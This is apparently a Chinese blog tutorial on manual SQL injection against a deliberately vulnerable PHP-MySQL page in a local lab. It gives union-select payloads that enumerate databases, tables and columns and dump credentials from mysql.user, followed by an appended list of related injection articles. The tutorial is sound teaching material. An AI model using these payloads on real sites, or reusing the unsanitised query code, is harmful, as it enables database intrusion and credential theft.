SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。

完整笔记地址https://www.cnblogs.com/LyShark/p/10632263.html

整形注入目录:

  • 搭建测试环境
  • 手工判断SQL注入点
  • 判断数据库权限
  • 判断字段数
  • 判断数据库版本
  • 查询数据库名称
  • 查询字段
  • 查询表中数据

搭建注入测试环境

1.首先在实验之前我们需要搭建相应的环境以供下面SQL注入例子的练习.

a.这里我们在Centos 7 上搭建一个LAMP环境.

  1. [root@localhost ~]# yum install -y httpd httpd-devel mariadb mariadb-server mysql-devel php php-mysql php-common php-gd php-xml
  2. 已加载插件:fastestmirror
  3. Loading mirror speeds from cached hostfile
  4. 软件包 httpd-2.4.-.el7.centos.x86_64 已安装并且是最新版本
  5. 软件包 httpd-devel-2.4.-.el7.centos.x86_64 已安装并且是最新版本
  6. 软件包 :mariadb-5.5.-.el7.x86_64 已安装并且是最新版本
  7. 软件包 :mariadb-server-5.5.-.el7.x86_64 已安装并且是最新版本
  8. 软件包 :mariadb-devel-5.5.-.el7.x86_64 已安装并且是最新版本
  9. 软件包 php-5.4.-.el7.x86_64 已安装并且是最新版本
  10. 软件包 php-mysql-5.4.-.el7.x86_64 已安装并且是最新版本
  11. 软件包 php-common-5.4.-.el7.x86_64 已安装并且是最新版本
  12. 软件包 php-gd-5.4.-.el7.x86_64 已安装并且是最新版本
  13. 软件包 php-xml-5.4.-.el7.x86_64 已安装并且是最新版本

b.进入MySQL并创建一个测试用的数据表,写入一些查询数据.

  1. [root@localhost ~]# mysql -uroot -p
  2. Enter password:
  3.  
  4. Welcome to the MariaDB monitor. Commands end with ; or \g.
  5. Your MariaDB connection id is 10
  6. Server version: 5.5.56-MariaDB MariaDB Server
  7.  
  8. Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
  9.  
  10. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  11.  
  12. MariaDB [(none)]> create database lyshark;
  13. Query OK, 1 row affected (0.06 sec)
  14.  
  15. MariaDB [(none)]> use lyshark;
  16. Database changed
  17.  
  18. MariaDB [lyshark]> create table lyshark (
  19. -> `id` int(10) NOT NULL,
  20. -> `title` varchar(1000) NOT NULL,
  21. -> `text` varchar(1000) NOT NULL
  22. -> );
  23. Query OK, 0 rows affected (0.13 sec)
  24.  
  25. MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (1,'admin','hello admin');
  26. Query OK, 1 row affected (0.00 sec)
  27.  
  28. MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (2,'lyshark','hello lyshark');
  29. Query OK, 1 row affected (0.06 sec)
  30.  
  31. MariaDB [lyshark]> insert into `lyshark` (`id`, `title`, `text`) values (3,'guest','hello guest');
  32. Query OK, 1 row affected (0.00 sec)

c.在apache网页目录下新建一个index.php文件,配置好权限.

  1. <?php
  2. $id = $_GET['id'];
  3. $connection = mysql_connect("127.0.0.1","root","");
  4. mysql_select_db("lyshark",$connection);
  5. $myquery = "select * from lyshark where id=$id";
  6. $result = mysql_query($myquery);
  7. while($row = mysql_fetch_array($result)){
  8. echo "编号: ".$row['id']."<br >";
  9. echo "标题: ".$row['title']."<br >";
  10. echo "内容: ".$row['text']."<br >";
  11. echo "<hr>";
  12. }
  13. mysql_close($connection);
  14. echo "执行的SQL语句: ".$myquery."<hr>";
  15. ?>

d.访问主页测试看是否能读取数据

  1. http://localhost/index.php?id=1

手工判断SQL注入点

提交单引号

使用and和or判断

我们也可以在参数后面加上 and 1=1 来判断是否存在注入点

和 and 1=0 对比一下看看有啥不同

经过上面的对比,我们可以看到 and 1=1 返回了数据,而and 1=0没有,这是由于1=1是一个为真的条件,前面的结果是true,true and true 所以没有任何问题,第二个 1=0 是个假条件, true and false 还是false,所以并没有数据返回。

接下来看下or、or就是或者,两个都为假,才会为假,只要一个为真就为真,把语句后面的id改成一个不存在的,后面接上or 1=1,这样的话就成了 false or true,结果为true。

下图可以看到,没有返回数据,记录不存在.

通过加法和减法判断

加法和减法的使用要区别是数字型还是字符型的注入、然后来区分了、可以看他后面的参数如果是数字、就一定是数字型、如果是一些字母的话就是字符型注入。

例如

select \* from user where id=4 #数字型注入 sql 语句
select \* from user where username=’fendo’ #字符型注入 sql 语句

输入加号

我们在参数输入1+1,看看返回的数据是不是id等于2的结果,这里注意一下+号在SQL语句是有特效含义的,所以我们要对其进行url编码,最后也就是%2b。

输入减号

减法是同样的道理,不过不需要对-号进行url编码了

判断数据库权限

判断ROOT权限,如果数值则说明存在root权限,否则不存在

and ord(mid(user(),1,1))=114

或者:

and (select count(\*) from mysql.user)>0

解释:

and (select count(\*) from mysql.user)>0 #如果结果返回正常,说明具有读写权限。
and (select count(\*) from mysql.user)>0 #返回错误,应该是管理员给数据库帐户降权了。

判断字段数

对于判断字段数有两种常用的猜测方式:

方式1:用union联合查询:and 1=1 union select 1,2,3,4,5…… 或 union select null,null,null……

UNION SELECT 联合查询:可以用于一个或多个SELECT的结果集,但是他有一个条件,就是两个select查询语句的查询必须要有相同的列才可以执行,利用这个特性我们可以进行对比查询,也就是说当我们union select的列与它查询的列相同时,页面返回正常。在and后面加上1=1或1=2的作用后面会讲。

例如:

a.首先猜测,当字段为2时页面返回错误

b.增加一个字段,为3时,页面显示正确

c.再次增加一个字段,为4时,页面显示错误

上面的结果,说明字段数就是3,输入的数大于或小于字段数时都会报错。使用 union select null,null,null 是一样的效果。

方式2:用order by 查询“order by * -- order by

order by查询:在sql语句中是对结果集的指定列进行排序,比如我们想让结果集按照第一列排序就是 order by 1 按照第二列排序 order by 2 依次类推,按照这个原理我们来判断他的字段数,如果我们按照他的第1列进行排序数据库会返回正常,但是当我们按照第100列排序,但是数据库中并不存在第100列,从而报错。

例如:

a.当我们测试到4时数据库无法显示数据.

b.说明该表只有三个字段.

===================这里存在两个小问题===================

第一个:大部分程序只会调用数据库查询的第一条语句进行查询然后返回(我们这个也是),而通过联合查询出的数据中,我们想看到的数据是在第二条语句中,如果我们想看到我们想要的数据有两种方法,第一种是让第一条数据返回假,

第二种是通过sql语句直接返回我们想要的数据。

第一种:我们让第一个查询的结果始终为假

上图可看到,什么都没有显示,因为填充时使用的null,所以返回的就是空null.

第二种:通过limit语句,limit在mysql中是用来分页的,通过他可以从查询出来的数据中获取我们想要的数据

LIMIT 子句可以被用于强制 SELECT 语句返回指定的记录数。LIMIT 接受一个或两个数字参数。参数必须是一个整数常量。如果给定两个参数,第一个参数指定第一个返回记录行的偏移量,第二个参数指定返回记录行的最大数目,初始记录行的偏移量是 0(而不是 1)。

例如:

SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15

在地址偶棉加入以下代码看看:

上图结果返回也是空,因为这使用的null,所以返回的还是null。

第二个:哪个列中的数据是在页面中显示出来的,有一些列中的数据只是用于后台程序处理,并不会在前台显示,所以我们需要判断哪个字段我们可以看到。

所以,我们要通过数字代替NULL进行查询,来确定哪些字段会在页面中显示。这也就是为什么我们不一开始就用数字而用null,因为union select 不仅要求列的数量相同 同时数据类型也要相似。

查询数据库版本

版本大于5.0的mysql的information_schema库中存储着mysql的所有数据库和表结构信息,所以可以利用information_schema库快速注入。

通过下面的语句可以判断数据库版本:

and ord(mid(version(),1,1))>51

解释1: 确认数据库版本,51是ASCII码3 正确则>4.0 错误则<4.0,当版本大于3.0时才能使用union方法;
解释2: ord()是mysql的函数用于获取二进制码;
解释3: mid()是mysql的函数用于截位操作;
解释4: version()是mysql的函数用于获取当前数据库的版本;

显示正确:我这用的的mysql版本是大于5.0的

查询数据库名称

方法1:

可以直接使用mysql自带函数database()查询得到数据库名:

方法2:

使用以下语句语句得到所有的数据库名:

index.php?id=2 union select null,schema_name,null from information_schema.schemata

还可以获取第一个库名:

index.php?id=2 union select null,schema_name,null from information_schema.schemata limit 0,1

上图,并没有显示数据库名而显示的是第一条语句查询出来的结果。在union前面加上and 1=2,就能显示出来了。

index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,1

获取第二个库名:

index.php?id=2 and 1=2 union select null,schema_name,null from information_schema.schemata limit 0,2

以此类推,即可获取到全部库..

查询数据表名称

在MySQL中,表名存放在information_schema数据库下tables表table_name字段中、查表名我们主要用到的是TABLES表。

方法1:

用group_concat它可以返回查询的所有结果,因为我们需要通过命名判断该我们需要的敏感数据。

group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组。

index.php?id=2 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='lyshark'

上图返回时正确的,数据库中就这3张表、这里我们的目标是lyshark表、因为当前的数据就是lyshark表中获取的。

方法2:

同样,使用下面的语句也是可以查出来的。

index.php?id=2 union select null,table_name,null from information_schema.tables where table_schema='lyshark'

查询字段

在MySQL中,字段名存放在information_schema数据库下columns表column_name字段中,这里使用的是columns表。

方法1:

index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='lyshark' and table_name='lyshark'

我们也可以查看mysql库user表中的字段。

index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='mysql' and table_name='user'

上图可以看出,我们已得到mysql库user表的所有字段.

方法2:

index.php?id=2 union select null,column_name,null from information_schema.columns where table_schema='mysql' and table_name='user'

同理,此处就不截图了.

查询表中数据

最终想得到的就是字段里的内容了、前面的数据库名、表名都获得了、获取值就很简单了。

方法1:

查询lyshark库中lyshark表中所有数据。

index.php?id=2 and 1=2 union select 1,group_concat(id,title,text),3 from lyshark

查询mysql数据库user表中的,Host,User,Password字段的内容.

index.php?id=2 and 1=2 union select 1,group_concat(Host,User,Password),3 from mysql.user

上图可以报出mysql的敏感数据.

方法2:

index.php?id=2 union select null,title,content from lyshark
index.php?id=2 union select Host,User,Password from mysql.user

方法3:

index.php?id=2 and 1=2 union select 1,2,concat(user,0x3c,pwd) from admin

方法2和方法3作用相同,此处不截图了。

SQL注入之PHP-MySQL实现手工注入-数字型的更多相关文章

  1. MySQL整形手工注入

    0x1 判断注入点: http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture http://www.xxx.org/members.php?id= ...

  2. 【菜鸟学注入】之MySQL报错注入详解

    本文转自:http://bbs.blackbap.org/forum.php?mod=viewthread&tid=6483&highlight=mysql%2B报错注入 用SQL注入 ...

  3. phpcms手工注入教程

    目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083 步骤: 一.靶机操作 1.进入靶机,查看IP地址: 开始-运行,输入cmd回车,出现命令行窗口 ...

  4. Sql注入之注入点类型和是否存在注入判断

    SQL注入之判断注入类型注入类型分为数字型和字符型和搜索型例如数字型语句:select * from table where id =3,则字符型如下:select * from table wher ...

  5. 小白日记41:kali渗透测试之Web渗透-SQL手工注入(三)-猜测列名、表名、库名、字段内容,数据库写入

    SQL手工注入 靶机:metasploitable(低)  1.当无权读取infomation_schema库[MySQL最重要的源数据库,必须有root权限]/拒绝union.order by语句 ...

  6. 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

    SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...

  7. 小白日记39:kali渗透测试之Web渗透-SQL手工注入(一)-检测方法

    SQL手工注入(一) SQL注入:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.[SQL注入原理] ##服务端程序将用户输入参数作为查询 ...

  8. [转载] MySQL数据库5.X版本基本手工注入总结

    MySQL数据库5.X版本基本手工注入总结 根据我对MySQL的认识,注入时,基本可以通过爆.盲注.报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话we ...

  9. MYSQL手工注入(详细步骤)—— 待补充

    0x00 SQL注入的分类: (1)基于从服务器接收到的响应         ▲基于错误的 SQL 注入         ▲联合查询的类型         ▲堆查询注射         ▲SQL 盲注 ...

随机推荐

  1. 华为QOS原理及配置

    http://www.tudou.com/programs/view/GWCiHfWC9FI/ FLASH : http://www.tudou.com/v/GWCiHfWC9FI/&reso ...

  2. 【NIFI】 实现数据库到数据库之间数据同步

    本里需要基础知识:[NIFI] Apache NiFI 安装及简单的使用 数据同步 界面如下: 具体流程: 1.使用ExecuteSQL连接mysql数据库,通过写sql查询所需要的数据 2.nifi ...

  3. python学习 day2 (3月2日)

    .if if else 和 if elif else 的区别是: 前者 判断第一个 判断完第二个 之后还会执行else: 后者是只有满足条件(即都不符合if.elif里的条件时才会进入else) 不清 ...

  4. 2018.12.31 NOIP训练 偶数个5(简单数论)

    传送门 对于出题人zxyoizxyoizxyoi先%\%%为敬题目需要龟速乘差评. 题意简述:5e55e55e5组数据,给出n,请你求出所有n位数中有偶数个5的有多少,n≤1e18n\le1e18n≤ ...

  5. Educational Codeforces Round 53 (Rated for Div. 2) E. Segment Sum

    https://codeforces.com/contest/1073/problem/E 题意 求出l到r之间的符合要求的数之和,结果取模998244353 要求:组成数的数位所用的数字种类不超过k ...

  6. Win7 VS2015环境编译cegui-0.8.5

    首先是去官网下载源码与依赖库 http://cegui.org.uk/ 然后得提一下,编译DX11版本带Effects11框架的话会有问题,也就是默认情况编译有问题,这是因为VS2015升级后编译器对 ...

  7. s4-5 以太网帧

    以太网所处的层次 IEEE 802.3/以太网MAC子层协议  IEEE802.3协议描述了运行在各种介质上1 Mb/s~10 Mb/s的1- 持续CSMA/CD协议的局域网标准.  很多人对以太 ...

  8. altera FIFO知识点

    虽然是很常用的IP,但经常用时还要看下文档,某些知识点如果能记住的话,还是可以节省很多时间的.   (1)输入输出位宽不相等 这里以输入16位数据输出为8位数据为例,写入两16位的数据,读出4个8位的 ...

  9. 批处理最完整人性化教程(.bat文件语法)

    原文链接:http://www.cnitblog.com/seeyeah/archive/2009/01/15/53808.html 这是一篇技术教程,我会用很简单的文字表达清楚自己的意思,你要你识字 ...

  10. jq+download+文件夹下载

    最近公司在做工程项目,实现文件夹下载. 网上找了很久,发现网上的代码都有相似的问题,不过最终还是让我找到了一个符合的项目. 工程: 进行项目文件夹下载功能分析,弄清楚文件夹下载的原理,提供的数据支持. ...